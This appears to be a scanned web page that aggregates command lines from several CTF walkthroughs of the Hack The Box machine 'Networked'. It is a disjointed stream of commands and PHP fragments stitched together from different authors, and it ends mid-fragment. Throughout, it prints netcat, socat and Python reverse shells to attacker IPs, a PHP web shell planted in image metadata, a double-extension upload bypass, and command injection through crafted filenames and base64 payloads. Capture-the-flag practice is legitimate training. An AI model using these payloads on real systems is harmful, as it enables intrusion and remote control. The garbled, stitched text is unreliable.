networked.htbwriteup.com
Open in
urlscan Pro
54.84.236.175
Public Scan
URL:
https://networked.htbwriteup.com/
Submission: On January 26 via api from US — Scanned from US
Submission: On January 26 via api from US — Scanned from US
Form analysis
0 forms found in the DOMText Content
NETWORKED WRITEUP & WALKTHROUGH For now this is a list commands by various authors. 0xdf [writeup] 2953,067 Omniscient nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.146 nmap -p 80,22,443 -sV -sC -oA scans/nmap-tcpscripts 10.10.10.146 tar xvf backup.tar tar xvf backup.tar 26 if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { php -a php > $filename="image.png"; php > $pieces = explode('.',$filename); print_r($pieces); php > $name= array_shift($pieces); echo $name; php > $name = str_replace('_','.',$name); echo $name; php > $ext = implode('.',$pieces); echo $ext; php > $filename="image.php.png"; php > $pieces = explode('.',$filename); print_r($pieces); php > $name= array_shift($pieces); echo $name; php > $name = str_replace('_','.',$name); echo $name; php > $ext = implode('.',$pieces); echo $ext; file shell.png nc -lnvp 443 bash-4.2$ ls -l php /home/guly/check_attack.php if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); ls -a php > $files = preg_grep('/^([^.])/', scandir('.')); print_r($files); nc -e sh 10.10.14.7 443 bash-4.2$ nc -e sh 10.10.14.7 443 nc -lnvp 443 echo nc -e /bin/bash 10.10.14.7 443 | base64 -w0 bash-4.2$ echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh nc -lnvp 443 bash-4.2$ touch '/var/www/html/uploads/a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b' a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); exec("nohup /bin/rm -f /var/www/html/uploads/a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b > /dev/null 2>&1 &"); nc -lnvp 443 sudo -l [guly@networked ~]$ sudo -l sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly sudo /usr/local/sbin/changename.sh cat /etc/sysconfig/network-scripts/ifcfg-guly command not found 0xRick [writeup] 89146 Omniscient root@kali:~/Desktop/HTB/boxes/networked# nmap -sV -sT -sC -o nmapinitial networked.htb root@kali:~/Desktop/HTB/boxes/networked# gobuster -u http://networked.htb/ -w /usr/share/wordlists/dirb/common.txt backup.tar 100%[=====================================================================================================================>] 10.00K --.-KB/s in 0.1s root@kali:~/Desktop/HTB/boxes/networked/backup# ls -la #echo "name $name - ext $ext\n"; return array($name,$ext); return array($name,$ext); //echo "prefix: $prefix - fname: $filename\n"; if (!(filter_var($prefix, FILTER_VALIDATE_IP))) { return array($ret,$msg); if (function_exists('finfo_file')) { if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system if (is_string($mime) && preg_match($regexp, $mime, $matches)) { return $file_type; if (function_exists('mime_content_type')) if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string return $file_type; return $file['type']; if (strpos($mime_type, 'image/') === 0) { return true; return false; echo ' '."\n"; if (in_array($file, $ignored)) continue; if (!($check[0])) { if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) { if ($i == 1) { echo "\n"; echo '\n"; if ($i == 4) { echo "\n"; if ($i < 4 && $i > 1) { echo "\n"; if (!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if ($myFile["error"] !== UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if (!$success) { echo " Unable to save file."; echo " file uploaded, refresh gallery"; root@kali:~/Desktop/HTB/boxes/networked# echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f");' >> ./shell.php.png root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1337 which python sh-4.2$ python -c "import pty;pty.spawn('/bin/bash')" python -c "import pty;pty.spawn('/bin/bash')" root@kali:~/Desktop/HTB/boxes/networked# stty raw -echo root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1337 bash-4.2$ ls -al bash-4.2$ ls -al if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); bash-4.2$ touch '; nc 10.10.xx.xx 1338 -c bash' root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1338 python -c "import pty;pty.spawn('/bin/bash')" root@kali:~/Desktop/HTB/boxes/networked# stty raw -echo root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1338 [guly@networked ~]$ ls -al sudo -l [guly@networked ~]$ sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly test bash [root@networked ~]# ls -la jirbj [writeup] 14521 Guru nmap -sV -p- -T4 10.10.10.146 tar xvf backup.tar cat upload.php if (!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if ($myFile["error"] !== UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if (!$success) { echo " Unable to save file."; echo " file uploaded, refresh gallery"; nc -nlvp 4444 http://10.10.10.146/uploads/10_10_14_5.php.jpg?cmd=nc 10.10.14.5 4444 -e /bin/bash python -c "import pty;pty.spawn('/bin/bash')" bash-4.2$ ls -la bash-4.2$ ls -la cat crontab.guly if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; nc -nlvp 5555 bash-4.2$ touch "; nc 10.10.14.5 5555 -e bash" bash-4.2$ ls -la bash-4.2$ echo "nc 10.10.14.5 5555 -e /bin/bash" > ./shell.sh python -c "import pty;pty.spawn('/bin/bash')" [guly@networked ~]$ ls -la [guly@networked ~]$ sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly sh-4.2# ls -la luckolen [writeup] 491 Hacker luc@kali:~/HTB/Networked$ nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.146 luc@kali:~/HTB/Networked$ gobuster dir -u http://10.10.10.146/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" if (!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if ($myFile["error"] !== UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if (!$success) { echo " Unable to save file."; echo " file uploaded, refresh gallery"; #echo "name $name - ext $ext\n"; return array($name,$ext); return array($name,$ext); //echo "prefix: $prefix - fname: $filename \n"; if (!(filter_var($prefix, FILTER_VALIDATE_IP))) { return array($ret,$msg); if (function_exists('finfo_file')) { if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system if (is_string($mime) && preg_match($regexp, $mime, $matches)) { return $file_type; if (function_exists('mime_content_type')) if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string return $file_type; return $file['type']; if (strpos($mime_type, 'image/') === 0) { return true; return false; luc@kali:~/HTB/Networked$ sudo nc -lnvp 443 bash-4.2$ ls -R if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; bash-4.2$ ls -l exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); bash-4.2$ touch '/var/www/html/uploads/; nc 10.10.14.9 444 -c bash' 10_10_14_9.jpg 10_10_14_9.php.jpg 127_0_0_1.png 127_0_0_2.png 127_0_0_3.png 127_0_0_4.png ; nc 10.10.14.9 444 -c bash index.html luc@kali:~/HTB/Networked$ sudo nc -lnvp 444 cat /home/guly/user.txt [guly@networked ~]$ sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly test bash phaz0n [writeup] 3812 Hacker nmap -sC -sV 10.10.10.146 gobuster dir -u http://10.10.10.146 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -x php if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if (strpos($mime_type, 'image/') === 0) { return true; return false; if (function_exists('finfo_file')) { if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system if (is_string($mime) && preg_match($regexp, $mime, $matches)) { return $file_type; nc -nlvp 443 nc -nlvp 443 sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")' if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; cd /var/www/html/uploads touch "test.txt" php /home/guly/check_attack.php rm -f /var/www/html/uploads/test.txt exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); bash-4.2$ touch "; nc 10.10.14.27 4444 -e '/bin/bash'" socat file:`tty`,raw,echo=0 tcp-listen:4444 bash-4.2$ touch "; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.27:4444" rm -f /var/www/html/uploads/; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.27:4444 socat file:`tty`,raw,echo=0 tcp-listen:4444 socat file:`tty`,raw,echo=0 tcp-listen:4444 sudo -l [guly@networked /]$ sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly test ps /tmp/foo nc -nlvp 3333 [guly@networked ~]$ echo "nc -e /bin/bash 10.10.14.27 3333" > /tmp/foo ps /tmp/foo nc -nlvp 3333 padraignix [writeup] 3415 Elite Hacker cat upload.php if (!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file1.'; if ($myFile["error"] !== UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file2"; cat lib.php if (function_exists('finfo_file')) { if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system if (is_string($mime) && preg_match($regexp, $mime, $matches)) { return $file_type; if (function_exists('mime_content_type')) if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string return $file_type; return $file['type']; if (strpos($mime_type, 'image/') === 0) { return true; return false; cat crontab.guly cat check_attack.php if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; sh-4.2$ touch "no; nc -c bash 10.10.xx.xx 31337" touch "no; nc -c bash 10.10.xx.xx 31337" sudo -l cat /usr/local/sbin/changename.sh !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly sudo -u root /usr/local/sbin/changename.sh samirettali [writeup] 458 Pro Hacker nmap -A -T4 10.10.10.146 gobuster dir -q -t 40 -w raft-large-directories.txt -u http://10.10.10.146 gobuster dir -q -t 40 -w raft-large-files.txt -u http://10.10.10.146 tar -xvf backup.tar if (!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if ($myFile["error"] !== UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if (!$success) { echo " Unable to save file."; echo " file uploaded, refresh gallery"; #echo "name $name - ext $ext\n"; return array($name,$ext); return array($name,$ext); //echo "prefix: $prefix - fname: $filename \n"; if (!(filter_var($prefix, FILTER_VALIDATE_IP))) { return array($ret,$msg); if (function_exists('finfo_file')) { if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system if (is_string($mime) && preg_match($regexp, $mime, $matches)) { return $file_type; if (function_exists('mime_content_type')) if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string return $file_type; return $file['type']; if (strpos($mime_type, 'image/') === 0) { return true; return false; exiftool -Comment='' hackthebox.png nc -lnvp 1337 nohup /bin/rm -f $path; ls > /dev/null 2>&1 & ; nc 10.10.14.1 1338 - bash touch \;nc\ 10\.10\.14\.4\ 1338\ -c\ bash nc -nlvp 1338 python -c "import pty; pty.spawn('/bin/bash')" [guly@networked ~]$ wc -c user.txt [root@networked network-scripts]# wc -c /root/root.txt nullarmor [writeup] 1026 Pro Hacker gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.146 -t 25 if (!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if ($myFile["error"] !== UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if (!$success) { echo " Unable to save file."; echo " file uploaded, refresh gallery"; exiftool -Comment='' shell.php.jpeg python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; command injection ;nc -e \$(which bash) 10.10.14.22 4444 touch ";nc -e \$(which bash) 10.10.14.22 4444" sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly borari [writeup] 721 Pro Hacker ssh on tcp/22 wget tar -xvf backup.tar $sock, 1=>$sock, 2=>$sock), $pipes); ?> nc -nvlp 443 ls /home sh-4.2\$ ls -lAh /home/guly ls -lAh /home/guly sh-4.2\$ /usr/bin/script -qc /bin/bash /dev/null /usr/bin/script -qc /bin/bash /dev/null bash-4.2\$ curl -s \| bash /dev/stdin -l 1 if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; //echo "prefix: $prefix - fname: $filename \n"; if (!(filter_var($prefix, FILTER_VALIDATE_IP))) { return array($ret,$msg); sh-4.2\$ ls -lAh ls -lAh sh-4.2\$ touch \-- \'/var/www/html/uploads; nc -c bash 10.10.14.18 445\' sh-4.2\$ ls -lAh ls -lAh nc -nvlp 445 \[guly@networked shm\]\$ sudo -l curl -s \| bash /dev/stdin -l 1 \[guly@networked \~\]\$ export NAME=\'; nc -c 10.10.14.18 443\' ; nc -c 10.10.14.18 443 guy0 nc -c bash 10.10.14.18 443 nc -c bash 10.10.14.18 443 0x3ashry [writeup] gobuster dir -u http://10.10.10.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o directory.txt 2>/dev/null tar xvf backup.tar if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; rm -f touch "; nc -c bash 10.10.16.10 5555" sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly Hilbert [writeup] gobuster dir -w -x .php,.txt -o -u http://10.10.10.146 exiftool -DocumentName="';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '';} __halt_compiler();?>" hilbert.jpg root@kali:~/HTB/Boxes/Networked# nc -nlvp 1234 if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); sh-4.2$ touch ";nc 10.10.14.3 1235 -c bash" root@kali:~/HTB/Boxes/Networked# nc -nlvp 1235 Not affliated with Hack The Box. '; echo "uploaded by $check[1]"; echo ""; echo "